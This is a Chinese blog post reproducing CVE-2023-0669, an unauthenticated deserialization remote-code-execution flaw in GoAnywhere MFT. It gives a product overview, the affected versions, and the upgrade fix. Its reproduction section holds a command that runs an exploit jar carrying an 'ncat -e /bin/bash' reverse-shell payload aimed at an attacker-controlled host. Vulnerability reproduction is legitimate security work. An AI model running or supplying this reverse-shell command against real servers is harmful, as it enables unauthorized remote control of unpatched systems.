CVE-2023-0669 GoAnywhereMFT反序列化漏洞复现

最新推荐文章于 2024-01-24 17:53:37 发布
最新推荐文章于 2024-01-24 17:53:37 发布
阅读量473 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32660043/article/details/129034849
版权

免责声明

文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!

GoAnywhereMFT

GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。

CVE-2023-0669

GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。

影响范围

GoAnywhereMFT小于7.1.2版本

漏洞复现

工具使用说明:
请添加图片描述

本地java版本:
请添加图片描述

使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://x.x.x.x/ -c "ncat -e /bin/bash yourvps yourport"
请添加图片描述

注意:-p 代理 不可不指定,否则会报错,将流量转到burp即可

burp数据包:
请添加图片描述

工具下载地址:公众号回复 CVE-2023-0669 获取

漏洞修复

更新到7.1.2版本。

cHr1s_h
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现 CVE-2023-0669 GoAnywhereMFT存在反序列化漏洞
nnn2188185的博客
04-17 750
GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669
GoAnywhere MFT 身份验证绕过漏洞 (CVE-2024-0204)
m0_50797689的博客
01-24 958
GoAnywhere MFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。
GoAnywhereMFT反序列化漏洞复现CVE-2023-0669
qq_32445755的博客
02-28 906
GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。2月1日,Fortra(此前名称为HelpSystems)通知GoAnywhere MFT用户注意一个“远程代码注入利用0day”。之后该公司还发布了两份其它安全通知,每份通知都提供了缓解措施和妥协指标 (IoCs)。
Goby漏洞更新|GoAnywhere MFT 反序列化漏洞CVE-2023-0669
m0_46699477的博客
04-13 290
GoAnywhere MFT 反序列化漏洞CVE-2023-0669
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
日立能源证实受GoAnywhere攻击影响,数据遭泄露
smellycat000的专栏
03-20 1046
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士日立能源公司证实称,Clop 勒索团伙通过GoAnyway 0day漏洞窃取数据后,公司数据遭泄露。日立能源是日本工程技术巨头日立的一部分,专注于能源解决方案和电力系统,年收入达到1000亿美元。攻击者利用Fortra GoAnywhere MFT 中的0day (CVE-2023-0669) 发动攻击。该漏洞首次披露于2023年2月3日。日立...
EncryptionHelper 用户密码加密
pairsfish的专栏(你知道东方在哪一边)
09-25 1049
public class EncryptionHelper {  public static void main(String args[]){   System.out.println(Enc("123456", "SHA-1"));  }  /**    * BASE64解密   *    * @param key   * @return   * @throws E
GoAnywhere 0day的首个受害者出现,CHS百万病患数据受影响
smellycat000的专栏
02-15 951
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士受最近披露的 GoAnywhere 管理文件传输 (MFT) 软件0day 漏洞 (CVE-2023-0669)的组织机构已浮出水面。GoAnywhere 的开发者 Fortra 发现该0day 已遭在野利用外,在2月1日披露信息并立即发布缓解措施和妥协指标 (IoCs),但一周后才发布补丁。目前受该攻击影响的受害者已出现。从美国证券管理委员会的...
赶紧排查这个零日漏洞!全球已有130多家企业组织中招
easylife206的专栏
02-20 320
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !据BleepingComputer 2月10日消息,Clop 勒索软件组织最近利用 GoAnywhere MFT 安全文件传输工具中的零日漏洞,从 130 多个企业组织中窃取了数据。该安全漏洞被追踪为 CVE-2023-0669,攻击者能够在未修补的 GoAnywhere MFT 实例上远程执行代码,并将其管理控制台...
WuThreat身份安全云-TVD每日漏洞情报-2023-02-08
wuthreat无胁科技的博客
02-08 509
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2022-42484,CNNVD-202301-2353。
速修复!Fortra GoAnywhere MFT 中存在严重的认证绕过漏洞
最新发布
smellycat000的专栏
01-24 156
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Fortra 提醒称 GoAnywhere MFT 7.4.1之前的版本中存在一个新的认证绕过漏洞,可导致攻击者创建新的管理员用户。GoAnywhere MFT 用于保护与客户以及业务合作伙伴之间传输文件的安全,客户遍布全球各地。它支持协助法律合规和审计的安全加密协议、自动化、中心化控制以及多种记录和报告工具。新发现的漏洞编号是CVE-2024-...
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4029
CVE-2023-21839漏洞复现
遭活跃利用的GoAnyWhere MFT 0day 补丁发布
smellycat000的专栏
02-08 931
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士最近爆出的GoAnyWhere 管理文件传输 (MFT) 软件的0day 补丁已发布。大约一周前有新闻报道称该漏洞已遭活跃利用,不过目前的攻击细节尚未披露。2月1日,Fortra(此前名称为HelpSystems)通知GoAnywhere MFT用户注意一个“远程代码注入利用0day”。之后该公司还发布了两份其它安全通知,每份通知都提供了缓解措施...
CVE-2020-14644 iiop反序列化漏洞分析1
08-03
"CVE-2020-14644是一个针对Oracle WebLogic Server的IIOP(Internet Inter-ORB Protocol)反序列化漏洞,主要影响12.2.1.3.0, 12.2.1.4.0, 和14.1.1.0.0这几个版本。该漏洞允许攻击者通过精心构造的恶意输入来触发...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值